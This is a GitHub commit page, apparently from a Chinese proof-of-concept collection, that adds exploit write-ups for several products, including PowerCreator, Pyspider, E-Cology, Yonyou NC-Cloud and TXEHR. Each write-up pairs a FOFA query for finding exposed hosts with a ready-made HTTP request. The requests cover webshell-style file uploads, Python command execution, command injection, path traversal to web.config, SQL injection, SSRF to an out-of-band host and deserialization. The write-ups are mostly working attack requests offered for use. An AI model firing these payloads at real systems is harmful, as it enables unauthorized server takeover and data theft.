-
Notifications
You must be signed in to change notification settings - Fork 879
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
16 changed files
with
454 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
## PowerCreator接口UploadResourcePic.ashx存在任意文件上传漏洞 | ||
|
||
PowerCreator接口 UploadResourcePic.ashx存在任意文件上传漏洞。攻击者可利用该漏洞上传webshell,获得服务器权限。 | ||
|
||
## fofa | ||
|
||
```yaml | ||
app="PowerCreator-CMS" | ||
``` | ||
|
||
![image-20240711194543726](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111945851.png) | ||
|
||
## poc | ||
|
||
```yaml | ||
POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1517.3.1 Ddg/17.3.1 | ||
Connection: close | ||
Content-Length: 246 | ||
Content-Disposition: form-data;name="file1";filename="poc.aspx"; | ||
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136 | ||
Accept-Encoding: gzip, deflate | ||
|
||
-----------------------------20873900192357278038549710136 | ||
Content-Disposition: form-data; name="file1"; filename="111.aspx" | ||
Content-Type: image/jpeg | ||
|
||
11111 | ||
-----------------------------20873900192357278038549710136-- | ||
``` | ||
|
||
![image-20240711194442981](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111944029.png) | ||
|
||
文件路径 `http://127.0.0.1/ResourcePic/ODM4Mg==.ASPX` | ||
|
||
![image-20240711194519399](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111945443.png) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
## Pyspider-WebUI未授权访问致远程代码执行漏洞 | ||
|
||
由于Pyspider WebUI未进行合理的访问控制,默认允许远程攻击者未授权访问webui界面,且系统内部存在python脚本在线编辑并运行的模块,导致未经身份验证的攻击者可远程执行python代码调用系统命令来获取服务器权限。 | ||
|
||
## fofa | ||
|
||
```yaml | ||
title="Dashboard - pyspider" | ||
``` | ||
|
||
## poc | ||
|
||
```yaml | ||
POST /debug/任意实例名/run HTTP/1.1 | ||
Host: your-ip | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | ||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 | ||
Accept-Encoding: gzip, deflate, br | ||
Content-Type: application/x-www-form-urlencoded | ||
Connection: close | ||
|
||
webdav_mode=false&script=import+os%0D%0A%0D%0Aprint%28os.system%28%27执行的命令%27%29%29&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D | ||
``` | ||
|
||
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407092258892.png) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
## 上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞 | ||
|
||
上海上讯信息技术股份有限公司运维管理系统 `/emailapply/RepeatSend`存在命令执行漏洞,获取服务器权限。 | ||
|
||
## fofa | ||
|
||
``` | ||
body="default/getloginhtml" | ||
``` | ||
|
||
## poc | ||
|
||
```yaml | ||
POST /emailapply/RepeatSend HTTP/1.1 | ||
Content-Type: application/x-www-form-urlencoded | ||
Connection: close | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.850.86 Safari/537.36 | ||
|
||
id='%0aping dnslog.cn%0a' | ||
``` | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -3,7 +3,7 @@ | |
## fofa | ||
|
||
``` | ||
body="/him/api/rest/v1.0/node/role | ||
body="/him/api/rest/v1.0/node/role" | ||
``` | ||
|
||
## poc | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
## **北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞** | ||
|
||
北京中科聚网信息技术有限公司的一体化运营平台是一个综合性的信息系统,旨在为企业或机构提供全方位的运营支持和管理服务。北京中科聚网信息技术有限公司一体化运营平台importVisualModuleImg接口存在文件上传漏洞,攻击者可利用此漏洞上传任意文件获取服务器权限。 | ||
|
||
## fofa | ||
|
||
```yaml | ||
title="一体化运营平台" || body="thirdparty/ueditor/WordPaster" | ||
``` | ||
|
||
## poc | ||
|
||
```yaml | ||
POST /manage/tplresource/importVisualModuleImg?moduleId=2 HTTP/1.1 | ||
Host: | ||
Accept-Encoding: gzip, deflate, br | ||
Accept: */* | ||
Accept-Language: en-US;q=0.9,en;q=0.8 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 | ||
Connection: close | ||
Cache-Control: max-age=0 | ||
Content-Type: multipart/form-data; boundary=----9979a3f1-cdb1-43af-af88-a9b48b67cf71 | ||
Content-Length: 198 | ||
Cookie: JSESSIONID=9438c497-92ad-4800-b821-20602adec4ac; rememberMe=dcOzuzCzFrtr02GhN9IwcsR9v759kvzO9wq/upEQ0jwsU5y/25kFW52CaKmZoRP7pwH979ifBBXB3b+li3PSXwZmxnh+bMgi6kv5vv8WNkNdy1pblj7sPxtwIm71auJPyyOl+aMKAhk/71leMQLpneRk/8f6USYL/acFuWhpjyuVU6oP6YJdIoCKGgdxAiUk; | ||
|
||
------9979a3f1-cdb1-43af-af88-a9b48b67cf71 | ||
Content-Disposition: form-data; name="file"; filename="tmp.jsp" | ||
Content-Type: multipart/form-data | ||
|
||
6666 | ||
------9979a3f1-cdb1-43af-af88-a9b48b67cf71-- | ||
``` | ||
|
||
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407101850568.png) | ||
|
||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
## **同享人力管理管理平台DownloadFile存在任意文件下载漏洞** | ||
|
||
同享软件成立于1997年,运营中心位于东莞南城南新产业国际。专注研发和推广人力资源信息化产品,帮助企业构建统一的人力资源数智化平台,快速提高企业人才管理能力,提升人力资源管理效率,帮助员工快速成长,协助企业实现智慧决策。同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞 | ||
|
||
## fofa | ||
|
||
```yaml | ||
body="/Assistant/Default.aspx" | ||
``` | ||
|
||
## poc | ||
|
||
```yaml | ||
POST /Service/DownloadTemplate.asmx HTTP/1.1 | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | ||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 | ||
Accept-Encoding: gzip, deflate, br | ||
Connection: close | ||
Cookie: ASP.NET_SessionId=f40br0ilcoosnxgllqrmltkd | ||
Upgrade-Insecure-Requests: 1 | ||
Priority: u=1 | ||
SOAPAction: http://tempuri.org/DownloadFile | ||
Content-Type: text/xml;charset=UTF-8 | ||
Host: | ||
Content-Length: 310 | ||
|
||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> | ||
<soapenv:Header/> | ||
<soapenv:Body> | ||
<tem:DownloadFile> | ||
<!--type: string--> | ||
<tem:path>../web.config</tem:path> | ||
</tem:DownloadFile> | ||
</soapenv:Body> | ||
</soapenv:Envelope> | ||
``` | ||
|
||
![image-20240710184711192](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407101847260.png) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,42 @@ | ||
## **慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞** | ||
|
||
慧学教育科技有限公司Campuswit uploadFiles存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 | ||
|
||
## fofa | ||
|
||
```yaml | ||
body="campuswit" | ||
``` | ||
|
||
## poc | ||
|
||
```yaml | ||
POST /v1/public/uploadFiles HTTP/1.1 | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 | ||
Content-Type: multipart/form-data; boundary=00content0boundary00 | ||
Host: | ||
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 | ||
Connection: close | ||
Content-Length: 412 | ||
|
||
--00content0boundary00 | ||
Content-Disposition: form-data; name="keep_filename" | ||
|
||
1 | ||
--00content0boundary00 | ||
Content-Disposition: form-data; name="check_file" | ||
|
||
1 | ||
--00content0boundary00 | ||
Content-Disposition: form-data; name="campuswitHash" | ||
|
||
campuswit_hash_success | ||
--00content0boundary00 | ||
Content-Disposition: form-data; name="file"; filename="1.php" | ||
Content-Type: text/php | ||
|
||
1234 | ||
--00content0boundary00-- | ||
``` | ||
|
||
![image-20240711184311236](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111843311.png) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
## 数字通OA-智慧政务接口payslip存在SQL注入漏洞 | ||
|
||
中科数字通(北京)科技有限公司全新架构的智慧办公系统,由9大类、50多个主要功能模块构成。旨在为组织单位内部提供全新一代智慧型协同办公系统,数字通指尖云平台-智慧政务存在SQL注入漏洞,可通过SQL注入可获取敏感信息。 | ||
|
||
## fofa | ||
|
||
```yaml | ||
暂无语法 | ||
``` | ||
|
||
## poc | ||
|
||
```yaml | ||
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1 | ||
Host: xx.xx.xx.xx | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | ||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 | ||
Accept-Encoding: gzip, deflate | ||
Connection: close | ||
Cookie: GOASESSID=i589f58naalabocmbidup7edl3 | ||
Upgrade-Insecure-Requests: 1 | ||
``` | ||
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111952197.png) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,68 @@ | ||
# 泛微E-Cology接口getFileViewUrl存在SSRF漏洞 | ||
|
||
泛微E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。 | ||
|
||
## fofa | ||
|
||
```yaml | ||
app="泛微-OA(e-cology)" | ||
``` | ||
|
||
## poc | ||
|
||
```yaml | ||
POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1 | ||
Host: your-ip | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 | ||
Accept-Encoding: gzip, deflate | ||
Accept-Language: zh-CN,zh;q=0.9 | ||
Content-Type: application/json | ||
Upgrade-Insecure-Requests: 1 | ||
|
||
{ | ||
"file_id": "1000", | ||
"file_name": "c", | ||
"download_url":"http://euixlkewfg.dgrh3.cn" | ||
} | ||
``` | ||
|
||
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407092255733.png) | ||
|
||
## afrog poc | ||
|
||
```yaml | ||
id: 泛微E-Cology接口getFileViewUrl存在SSRF漏洞 | ||
|
||
info: | ||
name: 泛微E-Cology接口getFileViewUrl存在SSRF漏洞 | ||
author: wy876 | ||
severity: high | ||
verified: true | ||
description: |- | ||
泛微E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。 | ||
Fofa: app="泛微-OA(e-cology)" | ||
reference: | ||
- https://blog.csdn.net/qq_41904294/article/details/140301289 | ||
tags: 泛微,ssrf | ||
created: 2024/07/10 | ||
|
||
set: | ||
oob: oob() | ||
oobHTTP: oob.HTTP | ||
oobDNS: oob.DNS | ||
|
||
rules: | ||
r0: | ||
request: | ||
method: POST | ||
path: /api/doc/mobile/fileview/getFileViewUrl | ||
headers: | ||
Content-Type: application/json | ||
body: | | ||
{"file_id": "1000","file_name": "c","download_url":"{{oobHTTP}}"} | ||
expression: response.status == 200 && oobCheck(oob, oob.ProtocolHTTP, 3) | ||
|
||
expression: r0() | ||
``` | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
## 用友NC-Cloud接口blobRefClassSea存在反序列化漏洞 | ||
|
||
用友NC Cloud接口 /ncchr/pm/ref/indiIssued/blobRefClassSearch 存在反序列漏洞。 | ||
|
||
## fofa | ||
|
||
```yaml | ||
app="用友-NC-Cloud" | ||
``` | ||
|
||
## poc | ||
|
||
```yaml | ||
POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1 | ||
Content-Type: application/json | ||
Host: | ||
Connection: close | ||
Cache-Control: max-age=0 | ||
Upgrade-Insecure-Requests: 1 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36 | ||
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 | ||
|
||
{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"DNSLOG.COM\"}}}"} | ||
``` | ||
|
Oops, something went wrong.